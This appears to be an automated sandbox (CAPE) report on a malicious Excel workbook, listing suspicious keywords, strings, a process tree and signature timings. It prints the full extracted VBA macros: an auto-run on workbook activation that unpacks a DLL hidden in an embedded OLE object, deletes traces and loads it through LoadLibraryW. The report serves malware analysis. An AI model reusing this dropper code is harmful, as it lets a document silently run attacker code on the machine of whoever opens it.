Executable file name Public Declare Function Wakeup Lib libGTPK1.dll () As Integer
Executable file name nm = nm.dll
Suspicious
Chr May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open May open a file
Shell May run an executable file or a system command
WScript_Shell May run an executable file or a system command
Binary May read or write a binary file (if combined with Open)
CreateObject May create an OLE object
Write May write to a file (if combined with Open)
Put May write to a file (if combined with Open)
Lib May run code from a DLL
Kill May delete a file
Lib May run code from a DLL
Shell May run an executable file or a system command
CreateObject May create an OLE object
FileCopy May copy a file
ActiveWorkbook_SaveAs May save the current workbook
AutoExec
Workbook_Activate Runs when the Excel Workbook is opened

Extracted Macros

VBA Filename Module1.bas Extracted Macro
#If Win64 Then
    Public Declare PtrSafe Function Wakeup Lib _
        "libGTPK2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Wakeup Lib _
        "libGTPK1.dll" () As Integer
#End If
   
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetMallocSpyCallback(pbVoodoo As Byte)
    tracemod = False
    numcases = 0
    'MsgBox ("ITestModule_SetMallocSpyCallback")
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
'LocalAppData
ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub




Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)
    Variable_5(2) = CByte(40 + 50)
    Variable_5(1 + 2) = CByte(40 + 104)
    
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
           Get Variable_1, , Variable_3
           If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                     If cur = Variable_6 Then
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close Variable_1
    
    Variable_1 = FreeFile
    Open nm For Binary Lock Read Write As #Variable_1
    For i = LBound(Variable_5) To UBound(Variable_5)
        Put #Variable_1, , CByte(Variable_5(i))
    Next i

    Close #Variable_1
End Sub
VBA Filename UserForm1.frm Extracted Macro
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub
VBA Filename Sem.cls Extracted Macro
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub
VBA Filename Module2.bas Extracted Macro
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub

VBA Filename Module3.bas Extracted Macro



Sub test()

Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
    Next
Next

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\favorite" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\libGTPK1"
    API_LENGTH = 282624
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\libGTPK2"
    API_LENGTH = 201216
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs NameFav, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1." + "bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Wakeup = Wakeup2(nm)
        Wakeup

End Sub

Vba2Graph

%3 NewValuje NewValuje Binary[2] , Int[1] , Write[1] , CByte[4] , Put[1] , Open[2] Workbook_Activate Workbook_Activate AppStart AppStart ExecuteExcel4Macro[2] , .show[1] , WScript.Shell[1] , CreateObject[1] , Replace[1] , Environ[1] Workbook_Activate->AppStart SystemButtonSettings SystemButtonSettings FindWindow[1] , show[1] FindWindowA (External) FindWindowA (External) SystemButtonSettings->FindWindowA (External) GetWindowLong (GetWindowLongA) (External) GetWindowLong (GetWindowLongA) (External) SystemButtonSettings->GetWindowLong (GetWindowLongA) (External) DrawMenuBar (External) DrawMenuBar (External) SystemButtonSettings->DrawMenuBar (External) SetWindowLong (SetWindowLongA) (External) SetWindowLong (SetWindowLongA) (External) SystemButtonSettings->SetWindowLong (SetWindowLongA) (External) x2 ITestModule_SetErrorInterface ITestModule_SetErrorInterface Int[1] , Chr[1] ITestModule_GetProviderInterface ITestModule_GetProviderInterface Int[1] UserForm_Activate UserForm_Activate Replace[1] ReplaceCurrentModule ReplaceCurrentModule Shell[1] , Int[1] , CreateObject[1] , ActiveWorkbook.SaveAs[1] , FileCopy[1] , Kill[1] , Application.DisplayAlerts[1] UserForm_Activate->ReplaceCurrentModule Wakeup (External) Wakeup (External) Wakeup2 (LoadLibraryW) (External) Wakeup2 (LoadLibraryW) (External) ITestModule_SetMallocSpyCallback ITestModule_SetMallocSpyCallback ITestModule_GetCase ITestModule_GetCase CStr[1] , Chr[1] , CreateObject[31] ReplaceCurrentModule->NewValuje ReplaceCurrentModule->Wakeup (External) KillArray KillArray Kill[1] ReplaceCurrentModule->KillArray ReplaceCurrentModule->Wakeup2 (LoadLibraryW) (External) test test Cells[1] , Application.ExecuteExcel4Macro[2] ITestModule_SetProviderInterface ITestModule_SetProviderInterface MsgBox[1] ITestModule_GetErrorInterface ITestModule_GetErrorInterface Int[1] UserForm_Initialize UserForm_Initialize Call[1] UserForm_Initialize->SystemButtonSettings ITestModule_Terminate ITestModule_Terminate
1.obj
E:\tmp\new_xls_test\09.10\crypt\1.obj
C:\Users\1\AppData\Local\Temp\1.obj
.text
`.data
.rsrc
@.reloc
wiatwain.pdb
_XcptFilter
malloc
_initterm
_amsg_exit
msvcrt.dll
_except_handler4_common
InterlockedExchange
Sleep
InterlockedCompareExchange
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
KERNEL32.dll
wiatwain.dll
.text
`.rdata
@.data
.rsrc
@.reloc
Microsoft Visual C++ Runtime Library
kernel32
delete[]
CreateWindowExW
DefWindowProcW
DestroyWindow
InflateRect
SetWindowPos
ReleaseDC
UnregisterClassA
ReleaseCapture
GetClientRect
DestroyIcon
SendMessageW
LoadIconA
CreateWindowExA
DestroyMenu
SetCapture
MoveWindow
PostMessageW
LoadStringW
OffsetRect
RegisterClassW
GetKeyState
GetSubMenu
SetWindowTextW
GetMenuStringW
SetActiveWindow
SetWindowLongW
GetMenu
GetCursorPos
MessageBeep
USER32.dll
CoWaitForMultipleHandles
CoInitialize
ole32.dll
msi.dll
VirtualAlloc
GetModuleHandleA
GetVersionExA
MultiByteToWideChar
WideCharToMultiByte
LocalFree
InterlockedIncrement
lstrlenW
GetVersionExW
HeapFree
GetModuleHandleW
DeleteCriticalSection
ExitProcess
CloseHandle
KERNEL32.dll
memcpy
MSVCRT.dll
_initterm
malloc
_adjust_fdiv
__dllonexit
_onexit
task.dll
(1,10141
uHyc[
.rsrc
hL.Z~
6{Ee^~
J.(D;
Nc)Jo
l.F4KJ
Z`,<"PBU~
qv;leS
+bP 2l
p Xh/M4
PAa%@dU}C(
?ZF8}
/6^Hg
`j0ap
/P(,:
KERNEL32.DLL
USER32.dll
GetProcAddress
LoadLibraryA
VirtualProtect
SetClipboardData
settings.dll
set_opt
1 B
cHRM
!iCCPICC Profile
&tEXtSoftware
!tEXtCreation Time
ID#mF&M
MbP?_
DINU"
InputBin
FORMSOURCE
RESDLL
UniresDLL
PaperSize
LETTER
Orientation
PORTRAIT
ColorMode
Color
Resolution
Res300
Package2
020430-
6}#2.0#0
#C:\Wind
tlb#OLE
2DF8D04C
gram Fil
\Microso
ft Share
d\OFFICE
ibrary
MSFo@rms>
EF626
51A-9348
ers\1\Ap
pData\Lo
Attribut
e VB_Nam
PredeHcla
b Workbo
dule1.Ap
Attribut
e VB_Nam
0819-
Pre decla
Attribut
e VB_Nam
20820-
Pre decla
Wakeup
LoadLibraryW
LoadLibraryW
Wakeup
Inside: ITestModule_SetErrorInterface
MsgBox ("ITestModule_SetMallocSpyCallback")
WScript.Shell
Inside: ITestModule_GetCase(
adolvl0.cnclose
adolvl0.cndefdat$
adolvl0.cnexec$
adolvl0.cnmode$
adolvl0.cnopen$
adolvl0.cnprop$
adolvl0.cnprovider$
adolvl0.cnstring$
adolvl0.cntimeout
adolvl0.fldactualsize
adolvl0.fldattributes
adolvl0.flddefinedsize$
adolvl0.fldname
adolvl0.fldoriginalvalue$
adolvl0.fldprecision$
adolvl0.fldtype
adolvl0.fldvalue$
adolvl0.rsactivecn$
adolvl0.rsclose
adolvl0.rsmove$
adolvl0.rsmovefirst
adolvl0.rsmovenext$
adolvl0.rsmoveprev$
adolvl0.rsopen$
adolvl0.rssource$
adolvl0.rssupports$
adolvl0.rsbof
adolvl0.rseof
adolvl0.rscachesize
adolvl0.rspagesize$
adolvl0.rsrequery
LocalAppData
Attribut
e VB_Nam
e = "Mod
If Win64
Public
Declare
PtrSafe
Function
libGTPK2
.dll" ()
ernel32"
back(
@- L1.Tag
.Expand
$Fo2l
([,adolvl
- 1) = C
reateObj
ect("ado
lvl0.rsm
et ca.se@s(numc
ZEndp Sel
Functio
Publi
c Sub Ne
wValuje(
s F@EBin
GetWindowLongA
SetWindowLongA
FindWindowA
DrawMenuBar
GetWindowLongA
SetWindowLongA
FindWindowA
DrawMenuBar
Attribut
e VB_Nam
e = "Mod
Declare
PtrSafe
Function
GetWind
9Lib "u
" (ByVal
Public
Sub Kil
Counta(
Find
Counta(
\favorite
.xlsx
\libGTPK1
\libGTPK2
\oleObj
Application
xl\embeddings\oleObject1.bin
Attribut
e VB_Nam
& Row
s(1).Add
xlR1C1
`Appli
0End
User!
x1.Tag +
ThisWork
book.She
). kms.It
em("xl\e
Attribut
e VB_Nam
e = "Mod
Attribut
e VB_Nam
e = "Mod
Attribut
e VB_Nam
e = "Mod
kernel32
LoadLibraryW
libGTPK1.dll
Wakeup
Variable_6W
Attribut
e VB_Nam
e = "Use
5D0B1FE3
-05FD-42
78-8314-
BD69EFF9
2B83}{FA
961BBC-B
5EC-4BBE
Pre decla
Sub Labe
l1_Click
Modul
&Call
SystemBu
ttonSett
BAK(
Attribut
e VB_Nam
e = "Use
D686AD29
-F019-41
88-B25F-
E0B41F7E
1286}{69
C376E0-C
2AE-4E30
-B9C5-0B
redecla
ChrK~0
ITestModule_SetMallocSpyCallback4a0
SetCaseProviderm`0
ITestModule_GetCaseA40
SetCaseError3u0
NewValuje5q0
nmh^0
fl?]0
UserForm_ActivateZs0
UserForm_Initialize5c0
dwNewLongXz0
FindWindowAJW0
lpWindowNamei30
Temp1LC0
Temp2MC0
Columnsp90
RCount-80
Temp3NC0
SaveAsf;0
CopyHerehe0
items`h0
Page1
Module1
UserForm1
Module2
Module3
UserForm3
Page11
Module4
Module5
Module6
Microsoft Forms 2.0 Form
Embedded Object
ZExif
Tahoma
TextBox2Templates
Tahoma6
Tahoma6
Microsoft Forms 2.0 Form
Embedded Object
Microsoft Excel
Page2
Worksheets
Root Entry
Workbook
_VBA_PROJECT_CUR
MBD0119A316
Ole10Native
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
WIATWAIN
FileVersion
6.1.7600.16385 (win7_rtm.090713-1255)
InternalName
WIATWAIN
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
WIATWAIN.DS
ProductName
Operating System
ProductVersion
6.1.7600.16385
VarFileInfo
Translation
010600
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
TestDll Inc
FileDescription
TestDll Inc
FileVersion
InternalName
TestDll Inc
OriginalFilename
TestDll.dll
ProductVersion
ProductName
TestDll Inc
VarFileInfo
Translation
1.obj%
E:\tmp\new_xls_test\09.10\crypt\1.obj
20% - Accent1
20% - Accent2
20% - Accent3
20% - Accent4
20% - Accent5
20% - Accent6
40% - Accent1
40% - Accent2
40% - Accent3
40% - Accent4
40% - Accent5
40% - Accent6
60% - Accent1
60% - Accent2
60% - Accent3
60% - Accent4
60% - Accent5
60% - Accent6
Accent1
Accent2
Accent3
Accent4
Accent5
Accent6
Calculation
Check Cell
Comma
Comma [0]
Currency
Currency [0]
Explanatory Text
Followed Hyperlink
Heading 1
Heading 2
Heading 3
Heading 4
Hyperlink
Input
Linked Cell
Neutral
Normal
Output
Percent
Title
Total
Warning Text
OneNote
Letter
{133619e4-143b-463a-b809-b1f51d05f973}
Picture 1
Page1
Page11
Module1
Module2
N0{00020819-0000-0000-C000-000000000046}
N0{00020820-0000-0000-C000-000000000046}
Module3
Module4
Module5
Module6
__SRP_0
__SRP_1
__SRP_2
__SRP_3
UserForm1
UserForm3
_VBA_PROJECT
PROJECT
0{D686AD29-F019-4188-B25F-E0B41F7E1286}{69C376E0-C2AE-4E30-B9C5-0BEA70D9CDC0}
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE#Microsoft Excel 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{EF62651A-9348-4E4F-86E7-10BB247466BE}#2.0#0#C:\Users\1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
PROJECTwm
UserForm1
1Page1
1Module1
1UserForm1
2Module2
3Module3
3UserForm3
1Page11
4Module4
5Module5
6Module6
CompObj
VBFrame
UserForm3
CompObj
VBFrame
SummaryInformation
DocumentSummaryInformation
This file is not on VirusTotal.

Process Tree

  • EXCEL.EXE 2024 "C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" /e

EXCEL.EXE, PID: 2024, Parent PID: 252
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" /e

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name CVR368A.tmp.cvr
Associated Filenames
C:\Users\user\AppData\Local\Temp\CVR368A.tmp.cvr
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 3.166 seconds )

  • 0.898 Deduplicate
  • 0.675 CAPE
  • 0.632 Static
  • 0.467 TargetInfo
  • 0.283 BehaviorAnalysis
  • 0.138 TrID
  • 0.048 Strings
  • 0.012 AnalysisInfo
  • 0.011 NetworkAnalysis
  • 0.002 Debug

Signatures ( 0.165 seconds )

  • 0.033 antiav_detectreg
  • 0.011 infostealer_ftp
  • 0.009 decoy_document
  • 0.009 stealth_timeout
  • 0.009 ransomware_files
  • 0.006 NewtWire Behavior
  • 0.006 api_spamming
  • 0.006 antianalysis_detectreg
  • 0.006 infostealer_im
  • 0.004 antivm_generic_scsi
  • 0.004 antidbg_windows
  • 0.004 antiav_detectfile
  • 0.004 ransomware_extensions
  • 0.003 persistence_autorun
  • 0.003 antivm_vbox_keys
  • 0.003 infostealer_bitcoin
  • 0.002 tinba_behavior
  • 0.002 Doppelganging
  • 0.002 antivm_generic_services
  • 0.002 antiemu_wine_func
  • 0.002 mimics_filetime
  • 0.002 PlugX
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 office_martian_children
  • 0.001 malicious_dynamic_function_loading
  • 0.001 bootkit
  • 0.001 rat_nanocore
  • 0.001 infostealer_browser
  • 0.001 exploit_getbasekerneladdress
  • 0.001 stealth_file
  • 0.001 betabot_behavior
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_disk
  • 0.001 infostealer_browser_password
  • 0.001 dynamic_function_loading
  • 0.001 cerber_behavior
  • 0.001 kovter_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 recon_fingerprint

Reporting ( 0.003 seconds )

  • 0.003 CompressResults
Task ID 94393
Mongo ID 5d9e777cc3c009112d67b40a
Cuckoo release 1.3-CAPE
Delete